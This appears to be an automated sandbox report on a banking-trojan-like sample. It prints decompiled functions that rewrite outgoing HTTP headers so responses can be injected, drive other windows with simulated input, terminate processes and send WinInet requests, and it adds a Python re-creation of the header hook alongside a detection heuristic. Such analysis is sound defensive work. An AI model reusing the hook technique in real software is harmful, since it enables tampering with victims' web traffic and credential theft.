    								 *(_t186 + 0x20) = _v88;
    								 *(_t186 + 0x28) = _a12;
    								goto L29;
    							}
    							_t202 = _v92;
    							__eflags = _t202;
    							if(__eflags != 0) {
    								_t136 = _v88;
    							} else {
    								_t202 = _a8;
    								_t136 = _a12;
    							}
    							_v84 = _t136;
    							_v104 = E0040CB94(_v84, __eflags, _t202, _v40, _v36,  &_v92);
    							E00416421( *((intOrPtr*)(_t207 + 0x44)));
    							__eflags = _v108;
    							if(_v108 != 0) {
    								__eflags = _t202 - _a8;
    								if(_t202 != _a8) {
    									E00416421(_t202);
    								}
    							} else {
    								__eflags = _t202 - _a8;
    								if(_t202 == _a8) {
    									goto L37;
    								}
    								_v92 = _t202;
    								_v88 = _v84;
    							}
    							goto L27;
    						} else {
    							E00410A15( &_v76);
    							LeaveCriticalSection(0x422fac);
    							_t111 =  *0x422fa8(0xffffe8a3, 0) | 0xffffffff;
    							goto L10;
    						}
    					} else {
    						E0040C47E(_v84);
    						E00410A15( &_v76);
    						goto L8;
    					}
    				}
    			}

    Instruction address column (one address per decompiled statement, 0x00000000 where the decompiler emitted a goto or label with no instruction of its own; its alignment with the C lines was lost in extraction): 178 entries, spanning 0x0040d342 to 0x0040d684.

    APIs
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D363
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D3C1
    • LeaveCriticalSection.KERNEL32(00422FAC,?), ref: 0040D408
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D573
    • EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D592
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D5F4
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D61D
    • EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D63C
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D684
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
    • String ID: Accept-Encoding$If-Modified-Since$identity
    • API String ID: 3286975823-3034467039
    • Opcode ID: a82a7ffa15f3f7e27cec8f4d138502100ef769a82ccdc260df0ec2ed83df59ba
    • Instruction ID: 03dd137094fcee7b82c66184d154036a8e17c3421522a32bba14c01c24d67de6
    • Opcode Fuzzy Hash: a82a7ffa15f3f7e27cec8f4d138502100ef769a82ccdc260df0ec2ed83df59ba
    • Instruction Fuzzy Hash: 3BA19D71904301EFCB10DF64DD45A5EBBF0BF88314F104A2AF855A72A1C778E999CB9A
    Uniqueness

    Uniqueness Score: -1.00%
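
    The listing for E0040D33C wraps a three-argument network call: it takes a critical section, looks the handle up in a table of 0x38-byte entries at *0x422fc8, and when the flags returned by E004100E7 have bit 1 set it calls its string helpers with "Accept-Encoding"/"identity", "TE" and "If-Modified-Since" on a copy of the outgoing buffer before passing the request on through *0x422f9c with the original three arguments. Forcing identity encoding and dropping TE and If-Modified-Since is exactly what an in-process HTTP interceptor needs so that the reply comes back uncompressed, without trailers and never as 304 Not Modified, i.e. in a form it can edit. The Python below is an added example, not code from the sample or from this report: it applies the same three edits to a constructed request and shows a proxy-side heuristic that keys on the result. That E0041B3CD sets a header and E0041B351 removes one is an assumption drawn only from their string arguments, and the "Mozilla" user-agent baseline in the detector is likewise assumed.

```python
"""Header rewrite performed on the send path by E0040D33C, and a matching
proxy-side heuristic.

Added example, not code from the sample or the sandbox report. The helper
semantics (set vs. remove) and the browser baseline are assumptions.
"""

# Constructed sample request, not captured traffic.
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"TE: trailers\r\n"
    b"If-Modified-Since: Sat, 01 Jan 2011 00:00:00 GMT\r\n"
    b"Content-Length: 9\r\n"
    b"\r\n"
    b"user=test"
)


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def join_request(request_line: bytes, headers, body: bytes) -> bytes:
    head = b"\r\n".join([request_line] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def set_header(headers, name: bytes, value: bytes):
    """Replace every existing copy of `name` with a single `name: value`
    (assumed behaviour of E0041B3CD)."""
    kept = [(n, v) for n, v in headers if n.lower() != name.lower()]
    return kept + [(name, value)]


def remove_header(headers, name: bytes):
    """Drop every copy of `name` (assumed behaviour of E0041B351)."""
    return [(n, v) for n, v in headers if n.lower() != name.lower()]


def rewrite_like_hook(raw: bytes) -> bytes:
    """Force an uncompressed, trailer-free, non-304 reply so an injected
    response can be edited in place before the browser sees it."""
    request_line, headers, body = split_request(raw)
    headers = set_header(headers, b"Accept-Encoding", b"identity")
    headers = remove_header(headers, b"TE")
    headers = remove_header(headers, b"If-Modified-Since")
    return join_request(request_line, headers, body)


def header_fingerprint_hits(raw: bytes) -> bool:
    """Proxy-side heuristic: a Mozilla-style browser request that advertises
    only `identity` encoding. Real browsers advertise gzip (assumed baseline),
    so this combination points at a rewrite like the one above."""
    _, headers, _ = split_request(raw)
    h = {n.lower(): v.lower() for n, v in headers}
    return h.get(b"accept-encoding") == b"identity" and b"mozilla" in h.get(b"user-agent", b"")
```

Run rewrite_like_hook over a pcap-extracted request to see what the browser would have sent after the hook, and header_fingerprint_hits over proxy logs; the heuristic is deliberately narrow, since some tooling legitimately sends identity, so treat a hit as a lead for host-side triage rather than a verdict.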

    C-Code - Quality: 100%
    			E00408309(void** __eax, char _a4) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __eax;
    				_t1 =  &(_t41[7]); // 0x0
    				_t15 =  *_t1;
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t2 =  &(_t41[3]); // 0x0
    				_t16 =  *_t2;
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t3 =  &(_t41[1]); // 0x0
    				_t17 =  *_t3;
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t4 =  &(_t41[5]); // 0x0
    				_t18 =  *_t4;
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t5 =  &(_t41[4]); // 0x0
    				_t19 =  *_t5;
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t7 =  &(_t41[0x56]); // 0x0
    					_t21 =  *_t7;
    					if(_t21 != 0) {
    						_t8 =  &(_t41[0x55]); // 0x0
    						SelectObject( *_t8, _t21);
    					}
    					_t9 =  &(_t41[0x57]); // 0x0
    					_t22 =  *_t9;
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t10 =  &(_t41[0x55]); // 0x0
    					_t23 =  *_t10;
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t11 =  &(_t41[0x58]); // 0x0
    					_t24 =  *_t11;
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t12 =  &(_t41[0x60]); // 0x0
    					_t25 =  *_t12;
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						_t13 =  &(_t41[0x62]); // 0x0
    						PostThreadMessageW( *_t13, 0x12, 0, 0);
    					}
    					_t20 = E00417E30( &(_t41[0x5f]));
    				}
    				return _t20;
    			}

    Instruction address column (one address per decompiled statement, 0x00000000 where the decompiler emitted a goto or label with no instruction of its own; its alignment with the C lines was lost in extraction): 61 entries, spanning 0x00408311 to 0x004083e1.

    APIs
    • DeleteObject.GDI32(00000000), ref: 0040831C
    • CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040832C
    • TlsFree.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00408337
    • CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00408345
    • UnmapViewOfFile.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040834F
    • CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040835C
    • SelectObject.GDI32(00000000,00000000), ref: 00408376
    • DeleteObject.GDI32(00000000), ref: 00408387
    • DeleteDC.GDI32(00000000), ref: 00408394
    • CloseHandle.KERNEL32(00000000,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 004083A5
    • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 004083B4
    • PostThreadMessageW.USER32 ref: 004083CD
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: d834e73421e69595f93be6843176a9cb2a2099d2cf137fd9d80b9da7c1939bc8
    • Instruction ID: eaa215e9056629facd5298c74796b916b689ba92ef4e8b992160449a7b0236ef
    • Opcode Fuzzy Hash: d834e73421e69595f93be6843176a9cb2a2099d2cf137fd9d80b9da7c1939bc8
    • Instruction Fuzzy Hash: 3021FA706007049BD7209B79DE48B97B7EDAF84B41F04493EB995F76E0DB79E8408A28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004094F1(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				long _v12;
    				signed char _v16;
    				struct tagRECT _v32;
    				char _v140;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				intOrPtr _t52;
    				void* _t85;
    				RECT* _t89;
    
    				_t89 = __edi;
    				_t86 = __ecx;
    				_t85 = __eax;
    				_t47 = E00408037(_a4) & 0x0000ffff;
    				_v16 = _t47;
    				if((_t47 & 0x00000001) != 0) {
    					L16:
    					return 1;
    				}
    				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
    					_v5 = 0;
    				} else {
    					_t7 = _t85 + 0x50; // 0x50
    					_t9 = _t85 + 0x3c; // 0x3c
    					_t86 =  &_v140;
    					E0041AA7A( &_v140, _t9, _v12, _t7, 2);
    					_v5 = E00419C04( &_v140);
    				}
    				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
    					L8:
    					if(E0040938F(_t85, _t86) == 0) {
    						L14:
    						_t52 = _a8;
    						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
    							IntersectRect( &_v32, _t52 + 4, _t89);
    							FillRect( *(_t85 + 0x154),  &_v32, 6);
    							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
    						}
    						goto L16;
    					}
    					E0041645D( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
    					ResetEvent( *(_t85 + 0xc));
    					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
    						goto L14;
    					}
    					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
    						_t35 = _t85 + 0x17c; // 0x17c
    						TerminateProcess( *_t35, 0);
    						E00417E30(_t35);
    						goto L14;
    					}
    					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
    						goto L14;
    					}
    					return _v5;
    				} else {
    					ResetEvent( *(_t85 + 0xc));
    					_t86 = _t89->left & 0x0000ffff;
    					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
    						goto L8;
    					} else {
    						goto L16;
    					}
    				}
    			}


    APIs
      • Part of subcall function 00408037: GetClassNameW.USER32 ref: 00408052
    • GetWindowThreadProcessId.USER32(?,?), ref: 0040951B
    • ResetEvent.KERNEL32(?), ref: 0040956A
    • PostMessageW.USER32(?,?,?,?), ref: 0040958D
    • WaitForSingleObject.KERNEL32(?,00000064), ref: 0040959C
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 004095C7
    • PostThreadMessageW.USER32 ref: 004095D7
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 004095E9
      • Part of subcall function 0041AA7A: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 0041AB20
      • Part of subcall function 00419C04: OpenMutexW.KERNEL32(00100000,00000000,00000000,004070EF,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 00419C0F
      • Part of subcall function 00419C04: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00419C1A
    • TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 0040960E
      • Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E3F
      • Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E48
    • IntersectRect.USER32 ref: 0040962E
    • FillRect.USER32 ref: 00409640
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00409654
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 2453266691-0
    • Opcode ID: 9cdada03d9b15558c28fbaf7133e0955164b631a5afa0fbd5879e739418eccc5
    • Instruction ID: 52000164b2bb1804357d02d8f88a082b6ea16886f9a7358d98d01ef7967112f6
    • Opcode Fuzzy Hash: 9cdada03d9b15558c28fbaf7133e0955164b631a5afa0fbd5879e739418eccc5
    • Instruction Fuzzy Hash: F841B031500204BBEF11AFA5DD44BEA7BB8AF04305F0480B6F944FA1A2D73ACD55DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E00407A82(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				struct HWND__* _v8;
    				char _v12;
    				struct HWND__* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed char _v32;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v92;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t107;
    				struct HWND__* _t108;
    				int _t113;
    				int _t114;
    				signed char _t143;
    				struct HWND__* _t144;
    				long _t147;
    				struct HWND__* _t170;
    				long _t171;
    				void* _t174;
    
    				_t174 = __eax;
    				_t107 =  *((intOrPtr*)(__eax + 0x10));
    				_v16 = 0;
    				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
    					_t108 =  *((intOrPtr*)(_t107 + 0x108));
    					_v16 = _t108;
    					if(_t108 != 0) {
    						_v32 = E004083E4(0, __eax, 0) & 0x0000ffff;
    					} else {
    						_v32 = 0;
    					}
    				} else {
    					if((_a4 & 0x00000001) != 0) {
    						E004075F4(_a12, _a8, __eax);
    						_a4 = _a4 & 0xfffffffe;
    					}
    					if((_a4 & 0x00000004) != 0) {
    						E00407585(0, _t174, 0, 0, 1);
    					}
    				}
    				_t143 = _a4;
    				 *( *(_t174 + 0x10) + 0x100) = _a8;
    				_t113 =  *(_t174 + 0x10);
    				 *(_t113 + 0x104) = _a12;
    				if(_t143 == 0) {
    					L69:
    					return _t113;
    				}
    				_v20 = _t143;
    				_t26 =  &_v20;
    				 *_t26 = _v20 & 0x00000002;
    				if( *_t26 == 0) {
    					if((_t143 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					E004083E4(1, _t174);
    					L14:
    					_v24 = _t143;
    					_t31 =  &_v24;
    					 *_t31 = _v24 & 0x00000020;
    					if( *_t31 == 0) {
    						if((_t143 & 0x00000040) == 0) {
    							L19:
    							_v28 = _t143;
    							_t36 =  &_v28;
    							 *_t36 = _v28 & 0x00000008;
    							if( *_t36 == 0) {
    								if((_t143 & 0x00000010) == 0) {
    									L24:
    									_t114 =  *(_t174 + 0x10);
    									_push( *((intOrPtr*)(_t114 + 0x104)));
    									_push( *((intOrPtr*)(_t114 + 0x100)));
    									0xc00000 = 0x64;
    									_t170 = E0041AB5D(0xc00000,  &_v12);
    									_t113 = _v12 + 0xfffffff6;
    									_v8 = _t170;
    									if(_t113 <= 7) {
    										_t113 = GetWindowLongW(_t170, 0xfffffff0);
    										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
    											_t113 = GetParent(_t170);
    											if(_t113 != 0) {
    												_v8 = _t113;
    												_t170 = _t113;
    											}
    										}
    									}
    									if(_t170 == 0) {
    										L35:
    										_t144 = _v16;
    										if(_t144 != 0) {
    											_t113 = IsWindow(_t144);
    											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
    												if(_a4 != 0x8001) {
    													_t113 = E00407585(0, _t174, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t144;
    												_v12 = 1;
    												_t170 = _t144;
    											}
    										}
    										goto L43;
    									} else {
    										_t113 = E00408037(_t170);
    										if((_t113 & 0x00000040) == 0) {
    											goto L35;
    										}
    										if(_t170 != _v16) {
    											_t113 = E00407585(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
    										}
    										_v12 = 1;
    										L43:
    										if(_t170 == 0) {
    											goto L69;
    										}
    										_v92.cbSize = 0x3c;
    										_t113 = GetWindowInfo(_t170,  &_v92);
    										if(_t113 == 0) {
    											goto L69;
    										}
    										_t113 = _a8 & 0x0000ffff;
    										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
    										if(_v12 != 1) {
    											_t171 = _a4;
    										} else {
    											_t113 = E00408037(_t170);
    											if((_t113 & 0x00000020) == 0) {
    												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
    												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
    											} else {
    												_t171 = _t147;
    											}
    										}
    										if(_v20 == 0) {
    											if((_a4 & 0x00000004) == 0) {
    												goto L55;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa2);
    											_push(0x202);
    											goto L54;
    										} else {
    											_push(_t147);
    											_push(_t171);
    											_push(0xa1);
    											_push(0x201);
    											L54:
    											_push(_v12);
    											_push( &_v92);
    											_push(_v8);
    											_t113 = E004077F4(_t174, 0xc00000);
    											L55:
    											if(_v24 == 0) {
    												if((_a4 & 0x00000040) == 0) {
    													L60:
    													if(_v28 == 0) {
    														if((_a4 & 0x00000010) == 0) {
    															L65:
    															if((_a4 & 0x00000001) != 0) {
    																_t113 = E004077F4(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
    															}
    															if((_a4 & 0x00000800) != 0) {
    																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E004083E4(0, _t174, 0) & 0x0000ffff, _t147);
    															}
    															goto L69;
    														}
    														_push(_t147);
    														_push(_t171);
    														_push(0xa5);
    														_push(0x205);
    														L64:
    														_push(_v12);
    														_push( &_v92);
    														_push(_v8);
    														_t113 = E004077F4(_t174, 0xc00000);
    														goto L65;
    													}
    													_push(_t147);
    													_push(_t171);
    													_push(0xa4);
    													_push(0x204);
    													goto L64;
    												}
    												_push(_t147);
    												_push(_t171);
    												_push(0xa8);
    												_push(0x208);
    												L59:
    												_push(_v12);
    												_push( &_v92);
    												_push(_v8);
    												_t113 = E004077F4(_t174, 0xc00000);
    												goto L60;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa7);
    											_push(0x207);
    											goto L59;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								E004083E4(2, _t174);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						E004083E4(4, _t174);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00407B8E
    • GetParent.USER32(00000000), ref: 00407BB0
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00407BD5
    • IsWindow.USER32(?), ref: 00407BF8
      • Part of subcall function 004075F4: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407608
      • Part of subcall function 004075F4: ReleaseMutex.KERNEL32(?), ref: 00407627
      • Part of subcall function 004075F4: GetWindowRect.USER32 ref: 00407634
      • Part of subcall function 004075F4: IsRectEmpty.USER32(?), ref: 004076B8
      • Part of subcall function 004075F4: GetWindowLongW.USER32(?,000000F0), ref: 004076C7
      • Part of subcall function 004075F4: GetParent.USER32(?), ref: 004076DD
      • Part of subcall function 004075F4: MapWindowPoints.USER32 ref: 004076E6
      • Part of subcall function 004075F4: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040770A
    • GetWindowInfo.USER32 ref: 00407C48
    • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00407D85
      • Part of subcall function 00407585: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004079BE,00000000), ref: 0040758B
      • Part of subcall function 00407585: ReleaseMutex.KERNEL32(?), ref: 004075BF
      • Part of subcall function 00407585: IsWindow.USER32(?), ref: 004075C6
      • Part of subcall function 00407585: PostMessageW.USER32(?,00000215,00000000,?), ref: 004075E0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: ffaacd615c24142a9139eb9c8131efa86fb6ed20c5413290bb4b10ed72a20a3a
    • Instruction ID: c825605dac071c82af849eb393ea501e35fadda9e5444364dc6277d18302d378
    • Opcode Fuzzy Hash: ffaacd615c24142a9139eb9c8131efa86fb6ed20c5413290bb4b10ed72a20a3a
    • Instruction Fuzzy Hash: 1E91B370E08348ABEB119E558985FBF7BB4AF40748F14407AF940762D1C7BCAA81D75A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00418109(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t18;
    				char* _t21;
    				signed int _t29;
    				char* _t30;
    				void* _t32;
    
    				_t29 = _a20 & 0x00000002;
    				_t18 = 0x8404f700;
    				if(_t29 != 0) {
    					_t18 = 0x8444f700;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t18 = _t18 | 0x00800000;
    				}
    				_t30 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t30 = "GET";
    				}
    				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, "�H@", _t18, 0);
    				if(_t32 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t29 == 0) {
    						_push(0x13);
    						_t21 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t21 = 0;
    					}
    					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
    						L14:
    						InternetCloseHandle(_t32);
    						goto L15;
    					} else {
    						_a20 = _a20 & 0x00000000;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L14;
    						} else {
    							return _t32;
    						}
    					}
    				}
    			}


    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,H@,8404F700,00000000), ref: 00418151
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00418178
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0041819D
    • InternetCloseHandle.WININET(00000000), ref: 004181B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST$H@
    • API String ID: 3080274660-2522771230
    • Opcode ID: 75f21b4dfa83db42cf8a44a0a0c6b44c577b70ca84c5a3fd311ab9d0f0ef7e64
    • Instruction ID: 0d041268688f69942ab74d9fc87565c432e31d5ce5f6ccb35d41d8e2edc9bda9
    • Opcode Fuzzy Hash: 75f21b4dfa83db42cf8a44a0a0c6b44c577b70ca84c5a3fd311ab9d0f0ef7e64
    • Instruction Fuzzy Hash: 1611B6722402097BEB218F509C45FE73A9CEB44754F14802AFE01E52E0DBB9DE9187EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041D404(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char _v92;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t22;
    				void* _t25;
    				long _t27;
    				void* _t28;
    				long _t29;
    				void* _t33;
    				void* _t39;
    				void* _t41;
    				void* _t44;
    				long _t49;
    				void* _t50;
    				void* _t57;
    				void* _t62;
    				void* _t69;
    				void* _t73;
    				WCHAR* _t77;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    
    				_t73 = __edx;
    				_t70 = __ecx;
    				_t22 = E0040679A(__ecx, 0x743c1521, 2);
    				_v28 = _t22;
    				if(_t22 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t25 = E004068C0();
    					__eflags = _t25;
    					if(_t25 == 0) {
    						L24:
    						E00419BF4(_v28);
    						__eflags = 0;
    						return 0;
    					}
    					_t27 = WaitForSingleObject( *0x422e04, 0xea60);
    					__eflags = _t27 - 0x102;
    					if(_t27 != 0x102) {
    						goto L24;
    					}
    					do {
    						_t28 = E0040D68B(_t70);
    						_v24 = _t28;
    						__eflags = _t28;
    						if(__eflags == 0) {
    							goto L22;
    						}
    						_t80 = E0041BF9B( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
    						_v20 = _t80;
    						__eflags = _t80;
    						if(__eflags == 0) {
    							L21:
    							E00416421(_v20);
    							E00416421(_v24);
    							goto L22;
    						}
    						_t70 = _v16;
    						_t33 = E0041CE99(_v16, __eflags, _t80);
    						__eflags = _t33;
    						if(_t33 == 0) {
    							goto L21;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_v8 = E004172F1(_t80, 1);
    							_v12 = E004172F1(_t80, 2);
    							_t39 = E004177D0(_t80, E00416F5E(_t80));
    							_t72 = _v8;
    							_t41 = E004177D0(_t72, E00416F5E(_v8));
    							_t70 = _v12;
    							_push(E004177D0(_t70, E00416F5E(_v12)));
    							_push(_t41);
    							_push(_t39);
    							_push(L"Global\\%08X%08X%08X");
    							_t73 = 0x20;
    							_t77 =  &_v92;
    							_t44 = E00417114(_t43, _t73, _t77);
    							_t82 = _t82 + 0x10;
    							__eflags = _t44 - 0x1f;
    							if(_t44 != 0x1f) {
    								goto L20;
    							}
    							_t69 = CreateMutexW(0x422978, 1, _t77);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								goto L20;
    							}
    							_t49 = GetLastError();
    							__eflags = _t49 - 0xb7;
    							if(_t49 == 0xb7) {
    								CloseHandle(_t69);
    								_t69 = 0;
    								__eflags = 0;
    							}
    							__eflags = _t69;
    							if(_t69 != 0) {
    								_t50 = 0x10;
    								_t78 = E004163F1(_t50);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									L19:
    									E00419BF4(_t69);
    									goto L20;
    								}
    								 *_t78 = E0041687F(_t51 | 0xffffffff, _t80);
